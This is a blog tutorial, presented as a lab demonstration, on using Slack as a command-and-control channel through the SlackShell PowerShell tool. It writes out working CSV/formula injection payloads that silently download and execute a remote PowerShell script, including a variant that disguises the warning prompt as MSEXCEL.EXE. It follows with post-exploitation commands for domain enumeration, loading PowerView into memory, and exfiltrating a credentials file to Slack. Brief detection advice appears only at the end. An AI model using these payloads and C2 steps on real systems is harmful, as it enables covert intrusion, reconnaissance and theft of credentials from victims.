Saturday, June 9, 2018

How to use Slack as C2 Sever

Hello All,

INTRODUCTION

The purpose of this post is to demonstrate how we can use slack channels as our Command & Control Server (C&C / C2) and walk you through the demonstration of how we can use the same for our benefits. This was also demonstrated in Null Mumbai meetups on 09-June-2018 (Slides).

Please note this post is only educational purpose.

What is Slack ?

Slack is a cloud-based set of proprietary team collaboration tools and services. It has a features of creating workspace which allows to create team and use it as a communication channel for the team. It supports group messaging, personal messaging, file sharing etc. Many organizations use slack for their communications and to have multiple groups based on the departments / task. It also support the integration with multiple applications like Gdrive, Jira, Dropbox etc.

What is Command & Control Server (C&C / C2) ?

In simple word the C&C servers are the centralized systems which issues directives to the infected systems which are connect to it. C&C servers can also be used to create a powerful network of infected systems which can be used in major attacks such as DDoS. C&C server connections are mainly observed in malware's which try to gain persistence on the infected systems. In general the infected systems connected to C&C servers are known as botnets and the network of botnets is known as zombies.



PATH OF EXPLORATION

While using twitter I came across the tweet from Brent Kennedy on an update of the SlackShell1.1 version. I immediately clicked on the github repo and started reading readme file. After reading the readme file I thought of playing with the repo and started using it for understanding all the available options.

REQUIREMENTS

1) System should have powershell version 3 or above.

2) Slack Workspace #anything.slack.com

Create a new slack workspace or use the existing one on which you have admin rights.
Link to create slack workspace.

3) Slack Legacy Token #xoxp-xxxxxxxxxxxx-xxxxxxxxxxxx-xxxxxxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Link to generate slack legacy token. This token will help us to connect to the slack channel and perform various task like sending / reading messages which will help us in executing our commands on the system

Note:- Please don't share the legacy token with anyone since it will grant access to the slack channel which can read / post message and can do many other things using the token. Please read the link for more details on safety of the token.

4) Slack Channel ID #XXXXXXXXX

Copy the slack channel id which you can see while accessing the slack app using in browser. 

Example Link of your slack channel

https://anything.slack.com/messages/ABC123456

The channel ID is "ABC123456".

LAB DETAILS

1) Domain Controller(Active Directory) 2k12 (10.0.2.15) 
2) Windows 10 (10.0.2.21) - Victim system
3) Kali Linux (10.0.2.4) - Attacker system


THE MOST AWAITED DEEP DIVE POC​

We will assume a scenario where we deliver our initial payload using Formula / CSV injection attack which will download our custom script from the url hosted on our local system and execute it in memory. Our script will then download the SlackShell1.1 powershell script and import it as a module. It will then execute the command to connect to our slack channel.

Custom Script



Run python web server which will host our script.

python -m SimpleHTTPServer 8000


Formula used to download the custom script. It will popup some alerts while executing the formula just click on yes and proceed.

=cmd|'/C powershell.exe -exec bypass -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(''http://10.0.2.4:8000/my.ps1'');powershell.exe -c iex($e)' !A1



There are ways of changing the text which is displayed in alert where it shows CMD.EXE so that it looks more genuine. Great post on twitter by Ryan Hanson helped us to complete our task by modifying CMD.EXE to any other text. We will use MSEXCEL.EXE so it looks more realistic.

=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /C powershell.exe -exec bypass -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(''http://10.0.2.4:8000/my.ps1'');powershell.exe -c iex($e)'!A1


Once the powershell script is executed the system will connect to our slack channel and we will get an message on slack channel with the system hostname.

 
Commands supported in the current repo.

1) Execute direct commands

We can directly type command in the slack channel which will be executed on the system. It can also help us to enumerate / fetch information from the system. 
Below are some example of how we can execute direct commands.

A) Execute some applications like Calculator.

     Command - calc.exe


B) Fetch system IP.

On the left side I have executed the ipconfig command in cmd to show that we are able to get the same IP details using slack.

     Command - ipconfig


C) Enumerate the user information.

     1) Identify current user.

         Command - whoami


     2) Find all local users on the system.

         Command - net user


     3) Find all users which are created in the domain.

         Command - net user /domain


     4) Fetch individuals users details. We will look at both local and domain users details. We will fetch the details for "IEUser" which is a local user and "user1" which is a domain user. We have found this user names while fetching all users info.

         Command - net user IEUser


         Command - net user user1 /domain


     5) Find all local group which are created on the system.

         Command - net localgroup


     6) Find all group which are created on the domain controller.

         Command - net group /domain


     7) Find users which are member of the group.  We will look at both local and domain users details. We will fetch the details for "Administrators" which is a local group and "Domain Admins" which is a domain Group. We have found this group names while fetching all group info.

         Command - net localgroup "Administrators"


         Command - net group "Domain Admins" /domain


D) Fetch system information.

     Command - systeminfo


Like demonstrated above we can further execute all other command directly to fetch any details or execute any application. All this information will help us to conduct more sophisticated attacks.

2) Execute command which will spawn a new powershell process and run the commands.

All the above commands can be executed in a new spawn process just by adding the runjob text at begin of the command. Below are some command which will be executed by spawning a new powershell process.

Command - runjob calc.exe


Command - runjob ipconfig


In similar context all the commands can be fired to run into another spawn powershell process.

Note - Use runjob only if there is a necessity to run the command into another process.

3) Importing files & loading the same into the memory.

Now just think if I tell that we can also import powershell scripts directly into memory and run them. It sounds really good right ?

So I will show how to import powerview script into memory and execute some command which will again help us in enumeration. We can import any powershell script but for this blog post I will only be using powerview script.

First we need to upload the powerview.ps1 script on the slack channel and the execute the below command to import it into memory.
Before executing the import command we can also check for files which are uploaded into the slack channel so that we specify proper script file name which will help us to avoid errors.

Command - files


Command - import PowerView.ps1


Since now the powerview script is successfully imported we will fire some command which we again help us to fetch domain, users information.

Below command will help us to fetch the domain information.

Command - Get-NetDomain


Below command will help us to fetch all users information.

Command - Get-NetUser


There are many more command which can be executed to gather information. List of available command can be found here.

4) Write / Save a file on disk.

We can write / save any file on the storage disk of the target system.

First we need to upload the file on the slack channel and then provide the path where the file needs to be saved. Below is the example of how can we write / save file on the disk.

Command - download test.txt C:\Users\user1\Desktop



5) Change / Traverse from current directories.

We can change / traverse from the current directory. This can help us to enumerate files located on the disk.

Command - cd C:\Users\user1\Desktop


6) Exfiltrate the data on the slack channel.

We can exfiltrate the data stored from the local file system to the slack channel. As I have stated above I will upload the cred.txt file to the slack channel. Since we are already on the desktop location we will use the below command. We can also specify the complete file path.

Command - upload cred.txt


7) Disconnect the system.

Since we have accomplish our goal of exfiltrating the cred.txt file we will disconnect the system.

Command - exit


We can gain many more details about the systems and also compromise more system in the network.
Individual system can connect to individual slack channel it will help us to manage the system easily.

8) Detection of such attacks.

A) Enable powershell logging on all the systems.
B) Monitor all the powershell command execution.
C) Monitor all the access towards slack from powershell.
D) Enable Attack Surface Reduction Rules (ASR) in exploit guard.

Note:- Exploit Guard ASR is only supported in windows 10 enterprise edition 1709 and above versions and also in server 2016

Thanks for reading the post.
Thanks to Brent Kennedy for creating such a great repo & Null Mumbai community for allowing me to present it in monthly chapter meetups.

Special Thanks to all my friends who help / supported / motivated me for writing blogs. 🙏

No comments:

Post a Comment

Windows Red Team Lab Journey

Hello All, It been long time since I wrote my last blog. Hopefully I will again get back on track and write some more blogs post soon whi...